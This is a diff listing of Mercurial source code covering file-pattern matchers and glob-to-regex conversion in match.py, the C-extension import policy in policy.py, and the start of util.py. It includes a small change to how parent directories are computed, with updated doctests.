1005 1003 def matchfn(self, f):
1006 1004 if not f.startswith(self._pathprefix):
1007 1005 return False
1008 1006 return self._matcher.matchfn(f[len(self._pathprefix):])
1009 1007
1010 1008 @propertycache
1011 1009 def _pathdirs(self):
1012 1010 return set(util.finddirs(self._path)) | {''}
1013 1011
1014 1012 def visitdir(self, dir):
1015 1013 if dir == self._path:
1016 1014 return self._matcher.visitdir('')
1017 1015 if dir.startswith(self._pathprefix):
1018 1016 return self._matcher.visitdir(dir[len(self._pathprefix):])
1019 1017 return dir in self._pathdirs
1020 1018
1021 1019 def visitchildrenset(self, dir):
1022 1020 if dir == self._path:
1023 1021 return self._matcher.visitchildrenset('')
1024 1022 if dir.startswith(self._pathprefix):
1025 1023 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1026 1024 if dir in self._pathdirs:
1027 1025 return 'this'
1028 1026 return set()
1029 1027
1030 1028 def isexact(self):
1031 1029 return self._matcher.isexact()
1032 1030
1033 1031 def prefix(self):
1034 1032 return self._matcher.prefix()
1035 1033
1036 1034 @encoding.strmethod
1037 1035 def __repr__(self):
1038 1036 return ('<prefixdirmatcher path=%r, matcher=%r>'
1039 1037 % (pycompat.bytestr(self._path), self._matcher))
1040 1038
1041 1039 class unionmatcher(basematcher):
1042 1040 """A matcher that is the union of several matchers.
1043 1041
1044 1042 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1045 1043 the first matcher.
1046 1044 """
1047 1045
1048 1046 def __init__(self, matchers):
1049 1047 m1 = matchers[0]
1050 1048 super(unionmatcher, self).__init__()
1051 1049 self.explicitdir = m1.explicitdir
1052 1050 self.traversedir = m1.traversedir
1053 1051 self._matchers = matchers
1054 1052
1055 1053 def matchfn(self, f):
1056 1054 for match in self._matchers:
1057 1055 if match(f):
1058 1056 return True
1059 1057 return False
1060 1058
1061 1059 def visitdir(self, dir):
1062 1060 r = False
1063 1061 for m in self._matchers:
1064 1062 v = m.visitdir(dir)
1065 1063 if v == 'all':
1066 1064 return v
1067 1065 r |= v
1068 1066 return r
1069 1067
1070 1068 def visitchildrenset(self, dir):
1071 1069 r = set()
1072 1070 this = False
1073 1071 for m in self._matchers:
1074 1072 v = m.visitchildrenset(dir)
1075 1073 if not v:
1076 1074 continue
1077 1075 if v == 'all':
1078 1076 return v
1079 1077 if this or v == 'this':
1080 1078 this = True
1081 1079 # don't break, we might have an 'all' in here.
1082 1080 continue
1083 1081 assert isinstance(v, set)
1084 1082 r = r.union(v)
1085 1083 if this:
1086 1084 return 'this'
1087 1085 return r
1088 1086
1089 1087 @encoding.strmethod
1090 1088 def __repr__(self):
1091 1089 return ('<unionmatcher matchers=%r>' % self._matchers)
1092 1090
1093 1091 def patkind(pattern, default=None):
1094 1092 '''If pattern is 'kind:pat' with a known kind, return kind.
1095 1093
1096 1094 >>> patkind(br're:.*\.c$')
1097 1095 're'
1098 1096 >>> patkind(b'glob:*.c')
1099 1097 'glob'
1100 1098 >>> patkind(b'relpath:test.py')
1101 1099 'relpath'
1102 1100 >>> patkind(b'main.py')
1103 1101 >>> patkind(b'main.py', default=b're')
1104 1102 're'
1105 1103 '''
1106 1104 return _patsplit(pattern, default)[0]
1107 1105
1108 1106 def _patsplit(pattern, default):
1109 1107 """Split a string into the optional pattern kind prefix and the actual
1110 1108 pattern."""
1111 1109 if ':' in pattern:
1112 1110 kind, pat = pattern.split(':', 1)
1113 1111 if kind in allpatternkinds:
1114 1112 return kind, pat
1115 1113 return default, pattern
1116 1114
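For instance (a doctest-style sketch; 'foo' is not a known pattern kind, so the whole string falls through to the default):

    >>> _patsplit(b're:.*\.c$', None)
    ('re', '.*\\.c$')
    >>> _patsplit(b'foo:bar', b'glob')
    ('glob', 'foo:bar')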
1117 1115 def _globre(pat):
1118 1116 r'''Convert an extended glob string to a regexp string.
1119 1117
1120 1118 >>> from . import pycompat
1121 1119 >>> def bprint(s):
1122 1120 ... print(pycompat.sysstr(s))
1123 1121 >>> bprint(_globre(br'?'))
1124 1122 .
1125 1123 >>> bprint(_globre(br'*'))
1126 1124 [^/]*
1127 1125 >>> bprint(_globre(br'**'))
1128 1126 .*
1129 1127 >>> bprint(_globre(br'**/a'))
1130 1128 (?:.*/)?a
1131 1129 >>> bprint(_globre(br'a/**/b'))
1132 1130 a/(?:.*/)?b
1133 1131 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1134 1132 [a*?!^][\^b][^c]
1135 1133 >>> bprint(_globre(br'{a,b}'))
1136 1134 (?:a|b)
1137 1135 >>> bprint(_globre(br'.\*\?'))
1138 1136 \.\*\?
1139 1137 '''
1140 1138 i, n = 0, len(pat)
1141 1139 res = ''
1142 1140 group = 0
1143 1141 escape = util.stringutil.regexbytesescapemap.get
1144 1142 def peek():
1145 1143 return i < n and pat[i:i + 1]
1146 1144 while i < n:
1147 1145 c = pat[i:i + 1]
1148 1146 i += 1
1149 1147 if c not in '*?[{},\\':
1150 1148 res += escape(c, c)
1151 1149 elif c == '*':
1152 1150 if peek() == '*':
1153 1151 i += 1
1154 1152 if peek() == '/':
1155 1153 i += 1
1156 1154 res += '(?:.*/)?'
1157 1155 else:
1158 1156 res += '.*'
1159 1157 else:
1160 1158 res += '[^/]*'
1161 1159 elif c == '?':
1162 1160 res += '.'
1163 1161 elif c == '[':
1164 1162 j = i
1165 1163 if j < n and pat[j:j + 1] in '!]':
1166 1164 j += 1
1167 1165 while j < n and pat[j:j + 1] != ']':
1168 1166 j += 1
1169 1167 if j >= n:
1170 1168 res += '\\['
1171 1169 else:
1172 1170 stuff = pat[i:j].replace('\\','\\\\')
1173 1171 i = j + 1
1174 1172 if stuff[0:1] == '!':
1175 1173 stuff = '^' + stuff[1:]
1176 1174 elif stuff[0:1] == '^':
1177 1175 stuff = '\\' + stuff
1178 1176 res = '%s[%s]' % (res, stuff)
1179 1177 elif c == '{':
1180 1178 group += 1
1181 1179 res += '(?:'
1182 1180 elif c == '}' and group:
1183 1181 res += ')'
1184 1182 group -= 1
1185 1183 elif c == ',' and group:
1186 1184 res += '|'
1187 1185 elif c == '\\':
1188 1186 p = peek()
1189 1187 if p:
1190 1188 i += 1
1191 1189 res += escape(p, p)
1192 1190 else:
1193 1191 res += escape(c, c)
1194 1192 else:
1195 1193 res += escape(c, c)
1196 1194 return res
1197 1195
1198 1196 def _regex(kind, pat, globsuffix):
1199 1197 '''Convert a (normalized) pattern of any kind into a
1200 1198 regular expression.
1201 1199 globsuffix is appended to the regexp of globs.'''
1202 1200
1203 1201 if rustext is not None:
1204 1202 try:
1205 1203 return rustext.filepatterns.build_single_regex(
1206 1204 kind,
1207 1205 pat,
1208 1206 globsuffix
1209 1207 )
1210 1208 except rustext.filepatterns.PatternError:
1211 1209 raise error.ProgrammingError(
1212 1210 'not a regex pattern: %s:%s' % (kind, pat)
1213 1211 )
1214 1212
1215 1213 if not pat and kind in ('glob', 'relpath'):
1216 1214 return ''
1217 1215 if kind == 're':
1218 1216 return pat
1219 1217 if kind in ('path', 'relpath'):
1220 1218 if pat == '.':
1221 1219 return ''
1222 1220 return util.stringutil.reescape(pat) + '(?:/|$)'
1223 1221 if kind == 'rootfilesin':
1224 1222 if pat == '.':
1225 1223 escaped = ''
1226 1224 else:
1227 1225 # Pattern is a directory name.
1228 1226 escaped = util.stringutil.reescape(pat) + '/'
1229 1227 # Anything after the pattern must be a non-directory.
1230 1228 return escaped + '[^/]+$'
1231 1229 if kind == 'relglob':
1232 1230 return '(?:|.*/)' + _globre(pat) + globsuffix
1233 1231 if kind == 'relre':
1234 1232 if pat.startswith('^'):
1235 1233 return pat
1236 1234 return '.*' + pat
1237 1235 if kind in ('glob', 'rootglob'):
1238 1236 return _globre(pat) + globsuffix
1239 1237 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1240 1238
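A few concrete translations, assuming the pure-Python path (rustext unavailable) and a '$' globsuffix:

    _regex(b'glob', b'*.c', b'$')        # -> '[^/]*\.c$'
    _regex(b'path', b'foo', b'$')        # -> 'foo(?:/|$)'
    _regex(b'rootfilesin', b'qux', b'$') # -> 'qux/[^/]+$'
    _regex(b'relre', b'tmp', b'$')       # -> '.*tmp' (globsuffix is not appended)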
1241 1239 def _buildmatch(kindpats, globsuffix, root):
1242 1240 '''Return regexp string and a matcher function for kindpats.
1243 1241 globsuffix is appended to the regexp of globs.'''
1244 1242 matchfuncs = []
1245 1243
1246 1244 subincludes, kindpats = _expandsubinclude(kindpats, root)
1247 1245 if subincludes:
1248 1246 submatchers = {}
1249 1247 def matchsubinclude(f):
1250 1248 for prefix, matcherargs in subincludes:
1251 1249 if f.startswith(prefix):
1252 1250 mf = submatchers.get(prefix)
1253 1251 if mf is None:
1254 1252 mf = match(*matcherargs)
1255 1253 submatchers[prefix] = mf
1256 1254
1257 1255 if mf(f[len(prefix):]):
1258 1256 return True
1259 1257 return False
1260 1258 matchfuncs.append(matchsubinclude)
1261 1259
1262 1260 regex = ''
1263 1261 if kindpats:
1264 1262 if all(k == 'rootfilesin' for k, p, s in kindpats):
1265 1263 dirs = {p for k, p, s in kindpats}
1266 1264 def mf(f):
1267 1265 i = f.rfind('/')
1268 1266 if i >= 0:
1269 1267 dir = f[:i]
1270 1268 else:
1271 1269 dir = '.'
1272 1270 return dir in dirs
1273 1271 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1274 1272 matchfuncs.append(mf)
1275 1273 else:
1276 1274 regex, mf = _buildregexmatch(kindpats, globsuffix)
1277 1275 matchfuncs.append(mf)
1278 1276
1279 1277 if len(matchfuncs) == 1:
1280 1278 return regex, matchfuncs[0]
1281 1279 else:
1282 1280 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1283 1281
1284 1282 MAX_RE_SIZE = 20000
1285 1283
1286 1284 def _joinregexes(regexps):
1287 1285 """gather multiple regular expressions into a single one"""
1288 1286 return '|'.join(regexps)
1289 1287
1290 1288 def _buildregexmatch(kindpats, globsuffix):
1291 1289 """Build a match function from a list of kinds and kindpats,
1292 1290 return regexp string and a matcher function.
1293 1291
1294 1292 Test too large input
1295 1293 >>> _buildregexmatch([
1296 1294 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1297 1295 ... ], b'$')
1298 1296 Traceback (most recent call last):
1299 1297 ...
1300 1298 Abort: matcher pattern is too long (20009 bytes)
1301 1299 """
1302 1300 try:
1303 1301 allgroups = []
1304 1302 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1305 1303 fullregexp = _joinregexes(regexps)
1306 1304
1307 1305 startidx = 0
1308 1306 groupsize = 0
1309 1307 for idx, r in enumerate(regexps):
1310 1308 piecesize = len(r)
1311 1309 if piecesize > MAX_RE_SIZE:
1312 1310 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1313 1311 raise error.Abort(msg)
1314 1312 elif (groupsize + piecesize) > MAX_RE_SIZE:
1315 1313 group = regexps[startidx:idx]
1316 1314 allgroups.append(_joinregexes(group))
1317 1315 startidx = idx
1318 1316 groupsize = 0
1319 1317 groupsize += piecesize + 1
1320 1318
1321 1319 if startidx == 0:
1322 1320 matcher = _rematcher(fullregexp)
1323 1321 func = lambda s: bool(matcher(s))
1324 1322 else:
1325 1323 group = regexps[startidx:]
1326 1324 allgroups.append(_joinregexes(group))
1327 1325 allmatchers = [_rematcher(g) for g in allgroups]
1328 1326 func = lambda s: any(m(s) for m in allmatchers)
1329 1327 return fullregexp, func
1330 1328 except re.error:
1331 1329 for k, p, s in kindpats:
1332 1330 try:
1333 1331 _rematcher(_regex(k, p, globsuffix))
1334 1332 except re.error:
1335 1333 if s:
1336 1334 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1337 1335 (s, k, p))
1338 1336 else:
1339 1337 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1340 1338 raise error.Abort(_("invalid pattern"))
1341 1339
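The grouping loop above exists because one huge compiled regex hits practical size limits; a standalone sketch of the same chunking idea (the function name is hypothetical, not part of this module):

    def _chunkregexps(regexps, maxsize=MAX_RE_SIZE):
        # Greedily pack alternatives into groups no larger than maxsize.
        groups, cur, size = [], [], 0
        for r in regexps:
            if cur and size + len(r) > maxsize:
                groups.append('|'.join(cur))
                cur, size = [], 0
            cur.append(r)
            size += len(r) + 1  # +1 for the '|' separator
        if cur:
            groups.append('|'.join(cur))
        return groups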
1342 1340 def _patternrootsanddirs(kindpats):
1343 1341 '''Returns roots and directories corresponding to each pattern.
1344 1342
1345 1343 This calculates the roots and directories exactly matching the patterns and
1346 1344 returns a tuple of (roots, dirs) for each. It does not return other
1347 1345 directories which may also need to be considered, like the parent
1348 1346 directories.
1349 1347 '''
1350 1348 r = []
1351 1349 d = []
1352 1350 for kind, pat, source in kindpats:
1353 1351 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1354 1352 root = []
1355 1353 for p in pat.split('/'):
1356 1354 if '[' in p or '{' in p or '*' in p or '?' in p:
1357 1355 break
1358 1356 root.append(p)
1359 1357 r.append('/'.join(root))
1360 1358 elif kind in ('relpath', 'path'):
1361 1359 if pat == '.':
1362 1360 pat = ''
1363 1361 r.append(pat)
1364 1362 elif kind in ('rootfilesin',):
1365 1363 if pat == '.':
1366 1364 pat = ''
1367 1365 d.append(pat)
1368 1366 else: # relglob, re, relre
1369 1367 r.append('')
1370 1368 return r, d
1371 1369
1372 1370 def _roots(kindpats):
1373 1371 '''Returns root directories to match recursively from the given patterns.'''
1374 1372 roots, dirs = _patternrootsanddirs(kindpats)
1375 1373 return roots
1376 1374
1377 1375 def _rootsdirsandparents(kindpats):
1378 1376 '''Returns roots and exact directories from patterns.
1379 1377
1380 1378 `roots` are directories to match recursively, `dirs` should
1381 1379 be matched non-recursively, and `parents` are the implicitly required
1382 1380 directories to walk to items in either roots or dirs.
1383 1381
1384 1382 Returns a tuple of (roots, dirs, parents).
1385 1383
1386 1384 >>> _rootsdirsandparents(
1387 1385 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1388 1386 ... (b'glob', b'g*', b'')])
1389 (['g/h', 'g/h', ''], [], ['g', ''])
1387 (['g/h', 'g/h', ''], [], ['', 'g'])
1390 1388 >>> _rootsdirsandparents(
1391 1389 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1392 ([], ['g/h', ''], ['g', ''])
1390 ([], ['g/h', ''], ['', 'g'])
1393 1391 >>> _rootsdirsandparents(
1394 1392 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1395 1393 ... (b'path', b'', b'')])
1396 (['r', 'p/p', ''], [], ['p', ''])
1394 (['r', 'p/p', ''], [], ['', 'p'])
1397 1395 >>> _rootsdirsandparents(
1398 1396 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1399 1397 ... (b'relre', b'rr', b'')])
1400 1398 (['', '', ''], [], [''])
1401 1399 '''
1402 1400 r, d = _patternrootsanddirs(kindpats)
1403 1401
1404 1402 p = []
1405 1403 # Append the parents as non-recursive/exact directories, since they must be
1406 1404 # scanned to get to either the roots or the other exact directories.
1407 1405 p.extend(util.dirs(d))
1408 1406 p.extend(util.dirs(r))
1409 # util.dirs() does not include the root directory, so add it manually
1410 p.append('')
1411 1407
1412 1408 # FIXME: all uses of this function convert these to sets, do so before
1413 1409 # returning.
1414 1410 # FIXME: all uses of this function do not need anything in 'roots' and
1415 1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1416 1412 return r, d, p
1417 1413
1418 1414 def _explicitfiles(kindpats):
1419 1415 '''Returns the potential explicit filenames from the patterns.
1420 1416
1421 1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1422 1418 ['foo/bar']
1423 1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1424 1420 []
1425 1421 '''
1426 1422 # Keep only the pattern kinds where one can specify filenames (vs only
1427 1423 # directory names).
1428 1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1429 1425 return _roots(filable)
1430 1426
1431 1427 def _prefix(kindpats):
1432 1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1433 1429 for kind, pat, source in kindpats:
1434 1430 if kind not in ('path', 'relpath'):
1435 1431 return False
1436 1432 return True
1437 1433
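Doctest-style sketch: only 'path' and 'relpath' kinds match recursively, so any other kind disqualifies the whole list:

    >>> _prefix([(b'path', b'foo', b'')])
    True
    >>> _prefix([(b'path', b'foo', b''), (b'glob', b'*.c', b'')])
    False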
1438 1434 _commentre = None
1439 1435
1440 1436 def readpatternfile(filepath, warn, sourceinfo=False):
1441 1437 '''parse a pattern file, returning a list of
1442 1438 patterns. These patterns should be given to compile()
1443 1439 to be validated and converted into a match function.
1444 1440
1445 1441 trailing white space is dropped.
1446 1442 the escape character is backslash.
1447 1443 comments start with #.
1448 1444 empty lines are skipped.
1449 1445
1450 1446 lines can be of the following formats:
1451 1447
1452 1448 syntax: regexp # defaults following lines to non-rooted regexps
1453 1449 syntax: glob # defaults following lines to non-rooted globs
1454 1450 re:pattern # non-rooted regular expression
1455 1451 glob:pattern # non-rooted glob
1456 1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1457 1453 pattern # pattern of the current default type
1458 1454
1459 1455 if sourceinfo is set, returns a list of tuples:
1460 1456 (pattern, lineno, originalline).
1461 1457 This is useful to debug ignore patterns.
1462 1458 '''
1463 1459
1464 1460 if rustext is not None:
1465 1461 result, warnings = rustext.filepatterns.read_pattern_file(
1466 1462 filepath,
1467 1463 bool(warn),
1468 1464 sourceinfo,
1469 1465 )
1470 1466
1471 1467 for warning_params in warnings:
1472 1468 # Can't be easily emitted from Rust, because it would require
1473 1469 # a mechanism for both gettext and calling the `warn` function.
1474 1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1475 1471
1476 1472 return result
1477 1473
1478 1474 syntaxes = {
1479 1475 're': 'relre:',
1480 1476 'regexp': 'relre:',
1481 1477 'glob': 'relglob:',
1482 1478 'rootglob': 'rootglob:',
1483 1479 'include': 'include',
1484 1480 'subinclude': 'subinclude',
1485 1481 }
1486 1482 syntax = 'relre:'
1487 1483 patterns = []
1488 1484
1489 1485 fp = open(filepath, 'rb')
1490 1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1491 1487 if "#" in line:
1492 1488 global _commentre
1493 1489 if not _commentre:
1494 1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1495 1491 # remove comments prefixed by an even number of escapes
1496 1492 m = _commentre.search(line)
1497 1493 if m:
1498 1494 line = line[:m.end(1)]
1499 1495 # fixup properly escaped comments that survived the above
1500 1496 line = line.replace("\\#", "#")
1501 1497 line = line.rstrip()
1502 1498 if not line:
1503 1499 continue
1504 1500
1505 1501 if line.startswith('syntax:'):
1506 1502 s = line[7:].strip()
1507 1503 try:
1508 1504 syntax = syntaxes[s]
1509 1505 except KeyError:
1510 1506 if warn:
1511 1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1512 1508 (filepath, s))
1513 1509 continue
1514 1510
1515 1511 linesyntax = syntax
1516 1512 for s, rels in syntaxes.iteritems():
1517 1513 if line.startswith(rels):
1518 1514 linesyntax = rels
1519 1515 line = line[len(rels):]
1520 1516 break
1521 1517 elif line.startswith(s+':'):
1522 1518 linesyntax = rels
1523 1519 line = line[len(s) + 1:]
1524 1520 break
1525 1521 if sourceinfo:
1526 1522 patterns.append((linesyntax + line, lineno, line))
1527 1523 else:
1528 1524 patterns.append(linesyntax + line)
1529 1525 fp.close()
1530 1526 return patterns
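For example, a hypothetical pattern file and the patterns it would produce (per the syntax table above; note that a bare 're:' prefix maps to the non-rooted 'relre:' kind):

    syntax: glob
    *.pyc
    build/
    re:^tmp/.*\.log$

    -> ['relglob:*.pyc', 'relglob:build/', 'relre:^tmp/.*\.log$']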
@@ -1,109 +1,109
1 1 # policy.py - module policy logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import sys
12 12
13 13 # Rules for how modules can be loaded. Values are:
14 14 #
15 15 # c - require C extensions
16 16 # allow - allow pure Python implementation when C loading fails
17 17 # cffi - required cffi versions (implemented within pure module)
18 18 # cffi-allow - allow pure Python implementation if cffi version is missing
19 19 # py - only load pure Python modules
20 20 #
21 21 # By default, fall back to the pure modules so the in-place build can
22 22 # run without recompiling the C extensions. This will be overridden by
23 23 # __modulepolicy__ generated by setup.py.
24 24 policy = b'allow'
25 25 _packageprefs = {
26 26 # policy: (versioned package, pure package)
27 27 b'c': (r'cext', None),
28 28 b'allow': (r'cext', r'pure'),
29 29 b'cffi': (r'cffi', None),
30 30 b'cffi-allow': (r'cffi', r'pure'),
31 31 b'py': (None, r'pure'),
32 32 }
33 33
34 34 try:
35 35 from . import __modulepolicy__
36 36 policy = __modulepolicy__.modulepolicy
37 37 except ImportError:
38 38 pass
39 39
40 40 # PyPy doesn't load C extensions.
41 41 #
42 42 # The canonical way to do this is to test platform.python_implementation().
43 43 # But we don't import platform and don't bloat for it here.
44 44 if r'__pypy__' in sys.builtin_module_names:
45 45 policy = b'cffi'
46 46
47 47 # Environment variable can always force settings.
48 48 if sys.version_info[0] >= 3:
49 49 if r'HGMODULEPOLICY' in os.environ:
50 50 policy = os.environ[r'HGMODULEPOLICY'].encode(r'utf-8')
51 51 else:
52 52 policy = os.environ.get(r'HGMODULEPOLICY', policy)
53 53
54 54 def _importfrom(pkgname, modname):
55 55 # from .<pkgname> import <modname> (where . is looked through this module)
56 56 fakelocals = {}
57 57 pkg = __import__(pkgname, globals(), fakelocals, [modname], level=1)
58 58 try:
59 59 fakelocals[modname] = mod = getattr(pkg, modname)
60 60 except AttributeError:
61 61 raise ImportError(r'cannot import name %s' % modname)
62 62 # force import; fakelocals[modname] may be replaced with the real module
63 63 getattr(mod, r'__doc__', None)
64 64 return fakelocals[modname]
65 65
66 66 # keep in sync with "version" in C modules
67 67 _cextversions = {
68 68 (r'cext', r'base85'): 1,
69 69 (r'cext', r'bdiff'): 3,
70 70 (r'cext', r'mpatch'): 1,
71 71 (r'cext', r'osutil'): 4,
72 (r'cext', r'parsers'): 12,
72 (r'cext', r'parsers'): 13,
73 73 }
74 74
75 75 # map import request to other package or module
76 76 _modredirects = {
77 77 (r'cext', r'charencode'): (r'cext', r'parsers'),
78 78 (r'cffi', r'base85'): (r'pure', r'base85'),
79 79 (r'cffi', r'charencode'): (r'pure', r'charencode'),
80 80 (r'cffi', r'parsers'): (r'pure', r'parsers'),
81 81 }
82 82
83 83 def _checkmod(pkgname, modname, mod):
84 84 expected = _cextversions.get((pkgname, modname))
85 85 actual = getattr(mod, r'version', None)
86 86 if actual != expected:
87 87 raise ImportError(r'cannot import module %s.%s '
88 88 r'(expected version: %d, actual: %r)'
89 89 % (pkgname, modname, expected, actual))
90 90
91 91 def importmod(modname):
92 92 """Import module according to policy and check API version"""
93 93 try:
94 94 verpkg, purepkg = _packageprefs[policy]
95 95 except KeyError:
96 96 raise ImportError(r'invalid HGMODULEPOLICY %r' % policy)
97 97 assert verpkg or purepkg
98 98 if verpkg:
99 99 pn, mn = _modredirects.get((verpkg, modname), (verpkg, modname))
100 100 try:
101 101 mod = _importfrom(pn, mn)
102 102 if pn == verpkg:
103 103 _checkmod(pn, mn, mod)
104 104 return mod
105 105 except ImportError:
106 106 if not purepkg:
107 107 raise
108 108 pn, mn = _modredirects.get((purepkg, modname), (purepkg, modname))
109 109 return _importfrom(pn, mn)
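Callers simply ask for a module by name and let the policy pick the implementation, as util.py does below:

    parsers = policy.importmod(r'parsers')
    # With HGMODULEPOLICY=py this resolves to mercurial.pure.parsers; the
    # default 'allow' policy prefers mercurial.cext.parsers and falls back.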
@@ -1,3317 +1,3318
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 56 base85 = policy.importmod(r'base85')
57 57 osutil = policy.importmod(r'osutil')
58 58 parsers = policy.importmod(r'parsers')
59 59
60 60 b85decode = base85.b85decode
61 61 b85encode = base85.b85encode
62 62
63 63 cookielib = pycompat.cookielib
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 safehasattr = pycompat.safehasattr
67 67 socketserver = pycompat.socketserver
68 68 bytesio = pycompat.bytesio
69 69 # TODO deprecate stringio name, as it is a lie on Python 3.
70 70 stringio = bytesio
71 71 xmlrpclib = pycompat.xmlrpclib
72 72
73 73 httpserver = urllibcompat.httpserver
74 74 urlerr = urllibcompat.urlerr
75 75 urlreq = urllibcompat.urlreq
76 76
77 77 # workaround for win32mbcs
78 78 _filenamebytestr = pycompat.bytestr
79 79
80 80 if pycompat.iswindows:
81 81 from . import windows as platform
82 82 else:
83 83 from . import posix as platform
84 84
85 85 _ = i18n._
86 86
87 87 bindunixsocket = platform.bindunixsocket
88 88 cachestat = platform.cachestat
89 89 checkexec = platform.checkexec
90 90 checklink = platform.checklink
91 91 copymode = platform.copymode
92 92 expandglobs = platform.expandglobs
93 93 getfsmountpoint = platform.getfsmountpoint
94 94 getfstype = platform.getfstype
95 95 groupmembers = platform.groupmembers
96 96 groupname = platform.groupname
97 97 isexec = platform.isexec
98 98 isowner = platform.isowner
99 99 listdir = osutil.listdir
100 100 localpath = platform.localpath
101 101 lookupreg = platform.lookupreg
102 102 makedir = platform.makedir
103 103 nlinks = platform.nlinks
104 104 normpath = platform.normpath
105 105 normcase = platform.normcase
106 106 normcasespec = platform.normcasespec
107 107 normcasefallback = platform.normcasefallback
108 108 openhardlinks = platform.openhardlinks
109 109 oslink = platform.oslink
110 110 parsepatchoutput = platform.parsepatchoutput
111 111 pconvert = platform.pconvert
112 112 poll = platform.poll
113 113 posixfile = platform.posixfile
114 114 readlink = platform.readlink
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 # small compat layer
130 130 compengines = compression.compengines
131 131 SERVERROLE = compression.SERVERROLE
132 132 CLIENTROLE = compression.CLIENTROLE
133 133
134 134 try:
135 135 recvfds = osutil.recvfds
136 136 except AttributeError:
137 137 pass
138 138
139 139 # Python compatibility
140 140
141 141 _notset = object()
142 142
143 143 def bitsfrom(container):
144 144 bits = 0
145 145 for bit in container:
146 146 bits |= bit
147 147 return bits
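For example, bitsfrom([0x1, 0x4, 0x8]) returns 0xd, the bitwise OR of the container's elements.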
148 148
149 149 # python 2.6 still has deprecation warnings enabled by default. We do not want
150 150 # to display anything to the standard user, so detect if we are running tests
151 151 # and only use python deprecation warnings in this case.
152 152 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
153 153 if _dowarn:
154 154 # explicitly unfilter our warning for python 2.7
155 155 #
156 156 # The option of setting PYTHONWARNINGS in the test runner was investigated.
157 157 # However, the module name set through PYTHONWARNINGS was matched exactly, so
158 158 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
159 159 # makes the whole PYTHONWARNINGS approach useless for our use case.
160 160 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
161 161 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
162 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
163 163 if _dowarn and pycompat.ispy3:
164 164 # silence warning emitted by passing user string to re.sub()
165 165 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
166 166 r'mercurial')
167 167 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
168 168 DeprecationWarning, r'mercurial')
169 169 # TODO: reinvent imp.is_frozen()
170 170 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
171 171 DeprecationWarning, r'mercurial')
172 172
173 173 def nouideprecwarn(msg, version, stacklevel=1):
174 174 """Issue an python native deprecation warning
175 175
176 176 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
177 177 """
178 178 if _dowarn:
179 179 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
180 180 " update your code.)") % version
181 181 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
182 182
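# Usage sketch (message and version are hypothetical); this only emits a
# warning when HGEMITWARNINGS is set in the environment:
#
#   >>> nouideprecwarn(b'foo.bar is deprecated, use foo.baz', b'5.1')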
